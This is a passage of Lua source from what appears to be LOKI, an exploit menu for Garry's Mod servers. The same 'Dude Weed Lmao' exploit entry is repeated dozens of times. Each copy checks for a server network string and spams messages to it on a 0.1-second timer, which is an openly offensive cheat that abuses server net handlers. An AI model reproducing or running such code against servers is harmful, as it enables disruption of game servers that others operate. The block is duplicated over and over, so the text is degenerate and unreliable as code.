  5597. { typ = "func", name = "Big Weed", func = function()
  5598. if !timer.Exists( "loki_bonghit" ) then
  5599. timer.Create( "loki_bonghit", 0.1, 0, function()
  5600. net.Start( "weed" )
  5601. net.WriteString( "DUDE" )
  5602. net.SendToServer()
  5603. end)
  5604. else
  5605. timer.Remove( "loki_bonghit" )
  5606. end
  5607. end, },
  5608. },
  5609. } )
  5610.  
  5611. LOKI.AddExploit( "Dude Weed Lmao", {
  5612. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5613. severity = 1,
  5614. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5615. functions = {
  5616. { typ = "func", name = "Big Weed", func = function()
  5617. if !timer.Exists( "loki_bonghit" ) then
  5618. timer.Create( "loki_bonghit", 0.1, 0, function()
  5619. net.Start( "weed" )
  5620. net.WriteString( "DUDE" )
  5621. net.SendToServer()
  5622. end)
  5623. else
  5624. timer.Remove( "loki_bonghit" )
  5625. end
  5626. end, },
  5627. },
  5628. } )
  5629.  
  5630. LOKI.AddExploit( "Dude Weed Lmao", {
  5631. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5632. severity = 1,
  5633. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5634. functions = {
  5635. { typ = "func", name = "Big Weed", func = function()
  5636. if !timer.Exists( "loki_bonghit" ) then
  5637. timer.Create( "loki_bonghit", 0.1, 0, function()
  5638. net.Start( "weed" )
  5639. net.WriteString( "DUDE" )
  5640. net.SendToServer()
  5641. end)
  5642. else
  5643. timer.Remove( "loki_bonghit" )
  5644. end
  5645. end, },
  5646. },
  5647. } )
  5648.  
  5649. LOKI.AddExploit( "Dude Weed Lmao", {
  5650. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5651. severity = 1,
  5652. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5653. functions = {
  5654. { typ = "func", name = "Big Weed", func = function()
  5655. if !timer.Exists( "loki_bonghit" ) then
  5656. timer.Create( "loki_bonghit", 0.1, 0, function()
  5657. net.Start( "weed" )
  5658. net.WriteString( "DUDE" )
  5659. net.SendToServer()
  5660. end)
  5661. else
  5662. timer.Remove( "loki_bonghit" )
  5663. end
  5664. end, },
  5665. },
  5666. } )
  5667.  
  5668. LOKI.AddExploit( "Dude Weed Lmao", {
  5669. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5670. severity = 1,
  5671. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5672. functions = {
  5673. { typ = "func", name = "Big Weed", func = function()
  5674. if !timer.Exists( "loki_bonghit" ) then
  5675. timer.Create( "loki_bonghit", 0.1, 0, function()
  5676. net.Start( "weed" )
  5677. net.WriteString( "DUDE" )
  5678. net.SendToServer()
  5679. end)
  5680. else
  5681. timer.Remove( "loki_bonghit" )
  5682. end
  5683. end, },
  5684. },
  5685. } )
  5686.  
  5687. LOKI.AddExploit( "Dude Weed Lmao", {
  5688. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5689. severity = 1,
  5690. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5691. functions = {
  5692. { typ = "func", name = "Big Weed", func = function()
  5693. if !timer.Exists( "loki_bonghit" ) then
  5694. timer.Create( "loki_bonghit", 0.1, 0, function()
  5695. net.Start( "weed" )
  5696. net.WriteString( "DUDE" )
  5697. net.SendToServer()
  5698. end)
  5699. else
  5700. timer.Remove( "loki_bonghit" )
  5701. end
  5702. end, },
  5703. },
  5704. } )
  5705.  
  5706. LOKI.AddExploit( "Dude Weed Lmao", {
  5707. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5708. severity = 1,
  5709. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5710. functions = {
  5711. { typ = "func", name = "Big Weed", func = function()
  5712. if !timer.Exists( "loki_bonghit" ) then
  5713. timer.Create( "loki_bonghit", 0.1, 0, function()
  5714. net.Start( "weed" )
  5715. net.WriteString( "DUDE" )
  5716. net.SendToServer()
  5717. end)
  5718. else
  5719. timer.Remove( "loki_bonghit" )
  5720. end
  5721. end, },
  5722. },
  5723. } )
  5724.  
  5725. LOKI.AddExploit( "Dude Weed Lmao", {
  5726. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5727. severity = 1,
  5728. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5729. functions = {
  5730. { typ = "func", name = "Big Weed", func = function()
  5731. if !timer.Exists( "loki_bonghit" ) then
  5732. timer.Create( "loki_bonghit", 0.1, 0, function()
  5733. net.Start( "weed" )
  5734. net.WriteString( "DUDE" )
  5735. net.SendToServer()
  5736. end)
  5737. else
  5738. timer.Remove( "loki_bonghit" )
  5739. end
  5740. end, },
  5741. },
  5742. } )
  5743.  
  5744. LOKI.AddExploit( "Dude Weed Lmao", {
  5745. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5746. severity = 1,
  5747. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5748. functions = {
  5749. { typ = "func", name = "Big Weed", func = function()
  5750. if !timer.Exists( "loki_bonghit" ) then
  5751. timer.Create( "loki_bonghit", 0.1, 0, function()
  5752. net.Start( "weed" )
  5753. net.WriteString( "DUDE" )
  5754. net.SendToServer()
  5755. end)
  5756. else
  5757. timer.Remove( "loki_bonghit" )
  5758. end
  5759. end, },
  5760. },
  5761. } )
  5762.  
  5763. LOKI.AddExploit( "Dude Weed Lmao", {
  5764. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5765. severity = 1,
  5766. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5767. functions = {
  5768. { typ = "func", name = "Big Weed", func = function()
  5769. if !timer.Exists( "loki_bonghit" ) then
  5770. timer.Create( "loki_bonghit", 0.1, 0, function()
  5771. net.Start( "weed" )
  5772. net.WriteString( "DUDE" )
  5773. net.SendToServer()
  5774. end)
  5775. else
  5776. timer.Remove( "loki_bonghit" )
  5777. end
  5778. end, },
  5779. },
  5780. } )
  5781.  
  5782. LOKI.AddExploit( "Dude Weed Lmao", {
  5783. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5784. severity = 1,
  5785. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5786. functions = {
  5787. { typ = "func", name = "Big Weed", func = function()
  5788. if !timer.Exists( "loki_bonghit" ) then
  5789. timer.Create( "loki_bonghit", 0.1, 0, function()
  5790. net.Start( "weed" )
  5791. net.WriteString( "DUDE" )
  5792. net.SendToServer()
  5793. end)
  5794. else
  5795. timer.Remove( "loki_bonghit" )
  5796. end
  5797. end, },
  5798. },
  5799. } )
  5800.  
  5801. LOKI.AddExploit( "Dude Weed Lmao", {
  5802. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5803. severity = 1,
  5804. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5805. functions = {
  5806. { typ = "func", name = "Big Weed", func = function()
  5807. if !timer.Exists( "loki_bonghit" ) then
  5808. timer.Create( "loki_bonghit", 0.1, 0, function()
  5809. net.Start( "weed" )
  5810. net.WriteString( "DUDE" )
  5811. net.SendToServer()
  5812. end)
  5813. else
  5814. timer.Remove( "loki_bonghit" )
  5815. end
  5816. end, },
  5817. },
  5818. } )
  5819.  
  5820. LOKI.AddExploit( "Dude Weed Lmao", {
  5821. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5822. severity = 1,
  5823. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5824. functions = {
  5825. { typ = "func", name = "Big Weed", func = function()
  5826. if !timer.Exists( "loki_bonghit" ) then
  5827. timer.Create( "loki_bonghit", 0.1, 0, function()
  5828. net.Start( "weed" )
  5829. net.WriteString( "DUDE" )
  5830. net.SendToServer()
  5831. end)
  5832. else
  5833. timer.Remove( "loki_bonghit" )
  5834. end
  5835. end, },
  5836. },
  5837. } )
  5838.  
  5839. LOKI.AddExploit( "Dude Weed Lmao", {
  5840. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5841. severity = 1,
  5842. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5843. functions = {
  5844. { typ = "func", name = "Big Weed", func = function()
  5845. if !timer.Exists( "loki_bonghit" ) then
  5846. timer.Create( "loki_bonghit", 0.1, 0, function()
  5847. net.Start( "weed" )
  5848. net.WriteString( "DUDE" )
  5849. net.SendToServer()
  5850. end)
  5851. else
  5852. timer.Remove( "loki_bonghit" )
  5853. end
  5854. end, },
  5855. },
  5856. } )
  5857.  
  5858. LOKI.AddExploit( "Dude Weed Lmao", {
  5859. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5860. severity = 1,
  5861. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5862. functions = {
  5863. { typ = "func", name = "Big Weed", func = function()
  5864. if !timer.Exists( "loki_bonghit" ) then
  5865. timer.Create( "loki_bonghit", 0.1, 0, function()
  5866. net.Start( "weed" )
  5867. net.WriteString( "DUDE" )
  5868. net.SendToServer()
  5869. end)
  5870. else
  5871. timer.Remove( "loki_bonghit" )
  5872. end
  5873. end, },
  5874. },
  5875. } )
  5876.  
  5877. LOKI.AddExploit( "Dude Weed Lmao", {
  5878. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5879. severity = 1,
  5880. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5881. functions = {
  5882. { typ = "func", name = "Big Weed", func = function()
  5883. if !timer.Exists( "loki_bonghit" ) then
  5884. timer.Create( "loki_bonghit", 0.1, 0, function()
  5885. net.Start( "weed" )
  5886. net.WriteString( "DUDE" )
  5887. net.SendToServer()
  5888. end)
  5889. else
  5890. timer.Remove( "loki_bonghit" )
  5891. end
  5892. end, },
  5893. },
  5894. } )
  5895.  
  5896. LOKI.AddExploit( "Dude Weed Lmao", {
  5897. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5898. severity = 1,
  5899. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5900. functions = {
  5901. { typ = "func", name = "Big Weed", func = function()
  5902. if !timer.Exists( "loki_bonghit" ) then
  5903. timer.Create( "loki_bonghit", 0.1, 0, function()
  5904. net.Start( "weed" )
  5905. net.WriteString( "DUDE" )
  5906. net.SendToServer()
  5907. end)
  5908. else
  5909. timer.Remove( "loki_bonghit" )
  5910. end
  5911. end, },
  5912. },
  5913. } )
  5914.  
  5915. LOKI.AddExploit( "Dude Weed Lmao", {
  5916. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5917. severity = 1,
  5918. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5919. functions = {
  5920. { typ = "func", name = "Big Weed", func = function()
  5921. if !timer.Exists( "loki_bonghit" ) then
  5922. timer.Create( "loki_bonghit", 0.1, 0, function()
  5923. net.Start( "weed" )
  5924. net.WriteString( "DUDE" )
  5925. net.SendToServer()
  5926. end)
  5927. else
  5928. timer.Remove( "loki_bonghit" )
  5929. end
  5930. end, },
  5931. },
  5932. } )
  5933.  
  5934. LOKI.AddExploit( "Dude Weed Lmao", {
  5935. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5936. severity = 1,
  5937. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5938. functions = {
  5939. { typ = "func", name = "Big Weed", func = function()
  5940. if !timer.Exists( "loki_bonghit" ) then
  5941. timer.Create( "loki_bonghit", 0.1, 0, function()
  5942. net.Start( "weed" )
  5943. net.WriteString( "DUDE" )
  5944. net.SendToServer()
  5945. end)
  5946. else
  5947. timer.Remove( "loki_bonghit" )
  5948. end
  5949. end, },
  5950. },
  5951. } )
  5952.  
  5953. LOKI.AddExploit( "Dude Weed Lmao", {
  5954. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5955. severity = 1,
  5956. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5957. functions = {
  5958. { typ = "func", name = "Big Weed", func = function()
  5959. if !timer.Exists( "loki_bonghit" ) then
  5960. timer.Create( "loki_bonghit", 0.1, 0, function()
  5961. net.Start( "weed" )
  5962. net.WriteString( "DUDE" )
  5963. net.SendToServer()
  5964. end)
  5965. else
  5966. timer.Remove( "loki_bonghit" )
  5967. end
  5968. end, },
  5969. },
  5970. } )
  5971.  
  5972. LOKI.AddExploit( "Dude Weed Lmao", {
  5973. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5974. severity = 1,
  5975. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5976. functions = {
  5977. { typ = "func", name = "Big Weed", func = function()
  5978. if !timer.Exists( "loki_bonghit" ) then
  5979. timer.Create( "loki_bonghit", 0.1, 0, function()
  5980. net.Start( "weed" )
  5981. net.WriteString( "DUDE" )
  5982. net.SendToServer()
  5983. end)
  5984. else
  5985. timer.Remove( "loki_bonghit" )
  5986. end
  5987. end, },
  5988. },
  5989. } )
  5990.  
  5991. LOKI.AddExploit( "Dude Weed Lmao", {
  5992. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  5993. severity = 1,
  5994. scan = function() return LOKI.ValidNetString( "weed" ) end,
  5995. functions = {
  5996. { typ = "func", name = "Big Weed", func = function()
  5997. if !timer.Exists( "loki_bonghit" ) then
  5998. timer.Create( "loki_bonghit", 0.1, 0, function()
  5999. net.Start( "weed" )
  6000. net.WriteString( "DUDE" )
  6001. net.SendToServer()
  6002. end)
  6003. else
  6004. timer.Remove( "loki_bonghit" )
  6005. end
  6006. end, },
  6007. },
  6008. } )
  6009.  
  6010. LOKI.AddExploit( "Dude Weed Lmao", {
  6011. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6012. severity = 1,
  6013. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6014. functions = {
  6015. { typ = "func", name = "Big Weed", func = function()
  6016. if !timer.Exists( "loki_bonghit" ) then
  6017. timer.Create( "loki_bonghit", 0.1, 0, function()
  6018. net.Start( "weed" )
  6019. net.WriteString( "DUDE" )
  6020. net.SendToServer()
  6021. end)
  6022. else
  6023. timer.Remove( "loki_bonghit" )
  6024. end
  6025. end, },
  6026. },
  6027. } )
  6028.  
  6029. LOKI.AddExploit( "Dude Weed Lmao", {
  6030. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6031. severity = 1,
  6032. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6033. functions = {
  6034. { typ = "func", name = "Big Weed", func = function()
  6035. if !timer.Exists( "loki_bonghit" ) then
  6036. timer.Create( "loki_bonghit", 0.1, 0, function()
  6037. net.Start( "weed" )
  6038. net.WriteString( "DUDE" )
  6039. net.SendToServer()
  6040. end)
  6041. else
  6042. timer.Remove( "loki_bonghit" )
  6043. end
  6044. end, },
  6045. },
  6046. } )
  6047.  
  6048. LOKI.AddExploit( "Dude Weed Lmao", {
  6049. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6050. severity = 1,
  6051. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6052. functions = {
  6053. { typ = "func", name = "Big Weed", func = function()
  6054. if !timer.Exists( "loki_bonghit" ) then
  6055. timer.Create( "loki_bonghit", 0.1, 0, function()
  6056. net.Start( "weed" )
  6057. net.WriteString( "DUDE" )
  6058. net.SendToServer()
  6059. end)
  6060. else
  6061. timer.Remove( "loki_bonghit" )
  6062. end
  6063. end, },
  6064. },
  6065. } )
  6066.  
  6067. LOKI.AddExploit( "Dude Weed Lmao", {
  6068. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6069. severity = 1,
  6070. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6071. functions = {
  6072. { typ = "func", name = "Big Weed", func = function()
  6073. if !timer.Exists( "loki_bonghit" ) then
  6074. timer.Create( "loki_bonghit", 0.1, 0, function()
  6075. net.Start( "weed" )
  6076. net.WriteString( "DUDE" )
  6077. net.SendToServer()
  6078. end)
  6079. else
  6080. timer.Remove( "loki_bonghit" )
  6081. end
  6082. end, },
  6083. },
  6084. } )
  6085.  
  6086. LOKI.AddExploit( "Dude Weed Lmao", {
  6087. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6088. severity = 1,
  6089. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6090. functions = {
  6091. { typ = "func", name = "Big Weed", func = function()
  6092. if !timer.Exists( "loki_bonghit" ) then
  6093. timer.Create( "loki_bonghit", 0.1, 0, function()
  6094. net.Start( "weed" )
  6095. net.WriteString( "DUDE" )
  6096. net.SendToServer()
  6097. end)
  6098. else
  6099. timer.Remove( "loki_bonghit" )
  6100. end
  6101. end, },
  6102. },
  6103. } )
  6104.  
  6105. LOKI.AddExploit( "Dude Weed Lmao", {
  6106. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6107. severity = 1,
  6108. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6109. functions = {
  6110. { typ = "func", name = "Big Weed", func = function()
  6111. if !timer.Exists( "loki_bonghit" ) then
  6112. timer.Create( "loki_bonghit", 0.1, 0, function()
  6113. net.Start( "weed" )
  6114. net.WriteString( "DUDE" )
  6115. net.SendToServer()
  6116. end)
  6117. else
  6118. timer.Remove( "loki_bonghit" )
  6119. end
  6120. end, },
  6121. },
  6122. } )
  6123.  
  6124. LOKI.AddExploit( "Dude Weed Lmao", {
  6125. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6126. severity = 1,
  6127. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6128. functions = {
  6129. { typ = "func", name = "Big Weed", func = function()
  6130. if !timer.Exists( "loki_bonghit" ) then
  6131. timer.Create( "loki_bonghit", 0.1, 0, function()
  6132. net.Start( "weed" )
  6133. net.WriteString( "DUDE" )
  6134. net.SendToServer()
  6135. end)
  6136. else
  6137. timer.Remove( "loki_bonghit" )
  6138. end
  6139. end, },
  6140. },
  6141. } )
  6142.  
  6143. LOKI.AddExploit( "Dude Weed Lmao", {
  6144. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6145. severity = 1,
  6146. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6147. functions = {
  6148. { typ = "func", name = "Big Weed", func = function()
  6149. if !timer.Exists( "loki_bonghit" ) then
  6150. timer.Create( "loki_bonghit", 0.1, 0, function()
  6151. net.Start( "weed" )
  6152. net.WriteString( "DUDE" )
  6153. net.SendToServer()
  6154. end)
  6155. else
  6156. timer.Remove( "loki_bonghit" )
  6157. end
  6158. end, },
  6159. },
  6160. } )
  6161.  
  6162. LOKI.AddExploit( "Dude Weed Lmao", {
  6163. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6164. severity = 1,
  6165. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6166. functions = {
  6167. { typ = "func", name = "Big Weed", func = function()
  6168. if !timer.Exists( "loki_bonghit" ) then
  6169. timer.Create( "loki_bonghit", 0.1, 0, function()
  6170. net.Start( "weed" )
  6171. net.WriteString( "DUDE" )
  6172. net.SendToServer()
  6173. end)
  6174. else
  6175. timer.Remove( "loki_bonghit" )
  6176. end
  6177. end, },
  6178. },
  6179. } )
  6180.  
  6181. LOKI.AddExploit( "Dude Weed Lmao", {
  6182. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6183. severity = 1,
  6184. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6185. functions = {
  6186. { typ = "func", name = "Big Weed", func = function()
  6187. if !timer.Exists( "loki_bonghit" ) then
  6188. timer.Create( "loki_bonghit", 0.1, 0, function()
  6189. net.Start( "weed" )
  6190. net.WriteString( "DUDE" )
  6191. net.SendToServer()
  6192. end)
  6193. else
  6194. timer.Remove( "loki_bonghit" )
  6195. end
  6196. end, },
  6197. },
  6198. } )
  6199.  
  6200. LOKI.AddExploit( "Dude Weed Lmao", {
  6201. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6202. severity = 1,
  6203. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6204. functions = {
  6205. { typ = "func", name = "Big Weed", func = function()
  6206. if !timer.Exists( "loki_bonghit" ) then
  6207. timer.Create( "loki_bonghit", 0.1, 0, function()
  6208. net.Start( "weed" )
  6209. net.WriteString( "DUDE" )
  6210. net.SendToServer()
  6211. end)
  6212. else
  6213. timer.Remove( "loki_bonghit" )
  6214. end
  6215. end, },
  6216. },
  6217. } )
  6218.  
  6219. LOKI.AddExploit( "Dude Weed Lmao", {
  6220. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6221. severity = 1,
  6222. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6223. functions = {
  6224. { typ = "func", name = "Big Weed", func = function()
  6225. if !timer.Exists( "loki_bonghit" ) then
  6226. timer.Create( "loki_bonghit", 0.1, 0, function()
  6227. net.Start( "weed" )
  6228. net.WriteString( "DUDE" )
  6229. net.SendToServer()
  6230. end)
  6231. else
  6232. timer.Remove( "loki_bonghit" )
  6233. end
  6234. end, },
  6235. },
  6236. } )
  6237.  
  6238. LOKI.AddExploit( "Dude Weed Lmao", {
  6239. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6240. severity = 1,
  6241. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6242. functions = {
  6243. { typ = "func", name = "Big Weed", func = function()
  6244. if !timer.Exists( "loki_bonghit" ) then
  6245. timer.Create( "loki_bonghit", 0.1, 0, function()
  6246. net.Start( "weed" )
  6247. net.WriteString( "DUDE" )
  6248. net.SendToServer()
  6249. end)
  6250. else
  6251. timer.Remove( "loki_bonghit" )
  6252. end
  6253. end, },
  6254. },
  6255. } )
  6256.  
  6257. LOKI.AddExploit( "Dude Weed Lmao", {
  6258. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6259. severity = 1,
  6260. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6261. functions = {
  6262. { typ = "func", name = "Big Weed", func = function()
  6263. if !timer.Exists( "loki_bonghit" ) then
  6264. timer.Create( "loki_bonghit", 0.1, 0, function()
  6265. net.Start( "weed" )
  6266. net.WriteString( "DUDE" )
  6267. net.SendToServer()
  6268. end)
  6269. else
  6270. timer.Remove( "loki_bonghit" )
  6271. end
  6272. end, },
  6273. },
  6274. } )
  6275.  
  6276. LOKI.AddExploit( "Dude Weed Lmao", {
  6277. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6278. severity = 1,
  6279. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6280. functions = {
  6281. { typ = "func", name = "Big Weed", func = function()
  6282. if !timer.Exists( "loki_bonghit" ) then
  6283. timer.Create( "loki_bonghit", 0.1, 0, function()
  6284. net.Start( "weed" )
  6285. net.WriteString( "DUDE" )
  6286. net.SendToServer()
  6287. end)
  6288. else
  6289. timer.Remove( "loki_bonghit" )
  6290. end
  6291. end, },
  6292. },
  6293. } )
  6294.  
  6295. LOKI.AddExploit( "Dude Weed Lmao", {
  6296. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6297. severity = 1,
  6298. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6299. functions = {
  6300. { typ = "func", name = "Big Weed", func = function()
  6301. if !timer.Exists( "loki_bonghit" ) then
  6302. timer.Create( "loki_bonghit", 0.1, 0, function()
  6303. net.Start( "weed" )
  6304. net.WriteString( "DUDE" )
  6305. net.SendToServer()
  6306. end)
  6307. else
  6308. timer.Remove( "loki_bonghit" )
  6309. end
  6310. end, },
  6311. },
  6312. } )
  6313.  
  6314. LOKI.AddExploit( "Dude Weed Lmao", {
  6315. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6316. severity = 1,
  6317. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6318. functions = {
  6319. { typ = "func", name = "Big Weed", func = function()
  6320. if !timer.Exists( "loki_bonghit" ) then
  6321. timer.Create( "loki_bonghit", 0.1, 0, function()
  6322. net.Start( "weed" )
  6323. net.WriteString( "DUDE" )
  6324. net.SendToServer()
  6325. end)
  6326. else
  6327. timer.Remove( "loki_bonghit" )
  6328. end
  6329. end, },
  6330. },
  6331. } )
  6332.  
  6333. LOKI.AddExploit( "Dude Weed Lmao", {
  6334. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6335. severity = 1,
  6336. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6337. functions = {
  6338. { typ = "func", name = "Big Weed", func = function()
  6339. if !timer.Exists( "loki_bonghit" ) then
  6340. timer.Create( "loki_bonghit", 0.1, 0, function()
  6341. net.Start( "weed" )
  6342. net.WriteString( "DUDE" )
  6343. net.SendToServer()
  6344. end)
  6345. else
  6346. timer.Remove( "loki_bonghit" )
  6347. end
  6348. end, },
  6349. },
  6350. } )
  6351.  
  6352. LOKI.AddExploit( "Dude Weed Lmao", {
  6353. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6354. severity = 1,
  6355. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6356. functions = {
  6357. { typ = "func", name = "Big Weed", func = function()
  6358. if !timer.Exists( "loki_bonghit" ) then
  6359. timer.Create( "loki_bonghit", 0.1, 0, function()
  6360. net.Start( "weed" )
  6361. net.WriteString( "DUDE" )
  6362. net.SendToServer()
  6363. end)
  6364. else
  6365. timer.Remove( "loki_bonghit" )
  6366. end
  6367. end, },
  6368. },
  6369. } )
  6370.  
  6371. LOKI.AddExploit( "Dude Weed Lmao", {
  6372. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6373. severity = 1,
  6374. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6375. functions = {
  6376. { typ = "func", name = "Big Weed", func = function()
  6377. if !timer.Exists( "loki_bonghit" ) then
  6378. timer.Create( "loki_bonghit", 0.1, 0, function()
  6379. net.Start( "weed" )
  6380. net.WriteString( "DUDE" )
  6381. net.SendToServer()
  6382. end)
  6383. else
  6384. timer.Remove( "loki_bonghit" )
  6385. end
  6386. end, },
  6387. },
  6388. } )
  6389.  
  6390. LOKI.AddExploit( "Dude Weed Lmao", {
  6391. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6392. severity = 1,
  6393. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6394. functions = {
  6395. { typ = "func", name = "Big Weed", func = function()
  6396. if !timer.Exists( "loki_bonghit" ) then
  6397. timer.Create( "loki_bonghit", 0.1, 0, function()
  6398. net.Start( "weed" )
  6399. net.WriteString( "DUDE" )
  6400. net.SendToServer()
  6401. end)
  6402. else
  6403. timer.Remove( "loki_bonghit" )
  6404. end
  6405. end, },
  6406. },
  6407. } )
  6408.  
  6409. LOKI.AddExploit( "Dude Weed Lmao", {
  6410. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6411. severity = 1,
  6412. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6413. functions = {
  6414. { typ = "func", name = "Big Weed", func = function()
  6415. if !timer.Exists( "loki_bonghit" ) then
  6416. timer.Create( "loki_bonghit", 0.1, 0, function()
  6417. net.Start( "weed" )
  6418. net.WriteString( "DUDE" )
  6419. net.SendToServer()
  6420. end)
  6421. else
  6422. timer.Remove( "loki_bonghit" )
  6423. end
  6424. end, },
  6425. },
  6426. } )
  6427.  
  6428. LOKI.AddExploit( "Dude Weed Lmao", {
  6429. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6430. severity = 1,
  6431. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6432. functions = {
  6433. { typ = "func", name = "Big Weed", func = function()
  6434. if !timer.Exists( "loki_bonghit" ) then
  6435. timer.Create( "loki_bonghit", 0.1, 0, function()
  6436. net.Start( "weed" )
  6437. net.WriteString( "DUDE" )
  6438. net.SendToServer()
  6439. end)
  6440. else
  6441. timer.Remove( "loki_bonghit" )
  6442. end
  6443. end, },
  6444. },
  6445. } )
  6446.  
  6447. LOKI.AddExploit( "Dude Weed Lmao", {
  6448. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6449. severity = 1,
  6450. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6451. functions = {
  6452. { typ = "func", name = "Big Weed", func = function()
  6453. if !timer.Exists( "loki_bonghit" ) then
  6454. timer.Create( "loki_bonghit", 0.1, 0, function()
  6455. net.Start( "weed" )
  6456. net.WriteString( "DUDE" )
  6457. net.SendToServer()
  6458. end)
  6459. else
  6460. timer.Remove( "loki_bonghit" )
  6461. end
  6462. end, },
  6463. },
  6464. } )
  6465.  
  6466. LOKI.AddExploit( "Dude Weed Lmao", {
  6467. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6468. severity = 1,
  6469. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6470. functions = {
  6471. { typ = "func", name = "Big Weed", func = function()
  6472. if !timer.Exists( "loki_bonghit" ) then
  6473. timer.Create( "loki_bonghit", 0.1, 0, function()
  6474. net.Start( "weed" )
  6475. net.WriteString( "DUDE" )
  6476. net.SendToServer()
  6477. end)
  6478. else
  6479. timer.Remove( "loki_bonghit" )
  6480. end
  6481. end, },
  6482. },
  6483. } )
  6484.  
  6485. LOKI.AddExploit( "Dude Weed Lmao", {
  6486. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6487. severity = 1,
  6488. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6489. functions = {
  6490. { typ = "func", name = "Big Weed", func = function()
  6491. if !timer.Exists( "loki_bonghit" ) then
  6492. timer.Create( "loki_bonghit", 0.1, 0, function()
  6493. net.Start( "weed" )
  6494. net.WriteString( "DUDE" )
  6495. net.SendToServer()
  6496. end)
  6497. else
  6498. timer.Remove( "loki_bonghit" )
  6499. end
  6500. end, },
  6501. },
  6502. } )
  6503.  
  6504. LOKI.AddExploit( "Dude Weed Lmao", {
  6505. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  6506. severity = 1,
  6507. scan = function() return LOKI.ValidNetString( "weed" ) end,
  6508. functions = {
  6509. { typ = "func", name = "Big Weed", func = function()
  6510. if !timer.Exists( "loki_bonghit" ) then
  6511. timer.Create( "loki_bonghit", 0.1, 0, function()
  6512. net.Start( "weed" )
  6513. net.WriteString( "DUDE" )
  6514. net.SendToServer()
  6515. end)
  6516. else
  6517. timer.Remove( "loki_bonghit" )
  6518. end
  6519. end, },
  6520. },
  6521. } )
  6522.  
